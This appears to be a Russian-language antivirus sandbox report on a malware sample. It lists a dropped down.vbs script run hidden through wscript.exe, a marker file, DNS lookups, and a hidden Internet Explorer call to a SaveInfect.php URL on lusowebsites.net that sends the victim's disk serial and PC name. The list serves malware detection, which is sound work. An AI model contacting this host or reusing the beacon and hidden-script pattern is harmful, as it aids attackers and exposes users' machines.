Техническая информация
- '%ProgramFiles(x86)%\internet explorer\iexplore.exe' http://ujmanus.lusowebsites.net/contador/SaveInfect.php?user=cez&hd=DDB4F502&pc=ixbhgzfopje&ex=.dat
- <Текущая директория>\down.vbs
- %ALLUSERSPROFILE%\marcador.txt
- <Текущая директория>\down.vbs
- DNS ASK gg###ba.com.br
- DNS ASK uj#####.lusowebsites.net
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- ClassName: 'Static' WindowName: ''
- '%WINDIR%\syswow64\wscript.exe' "<Текущая директория>\down.vbs"
- '%WINDIR%\syswow64\wscript.exe' "<Текущая директория>\down.vbs" (со скрытым окном)
- '%ProgramFiles(x86)%\internet explorer\iexplore.exe' http://ujmanus.lusowebsites.net/contador/SaveInfect.php?user=cez&hd=DDB4F502&pc=ixbhgzfopje&ex=.dat (со скрытым окном)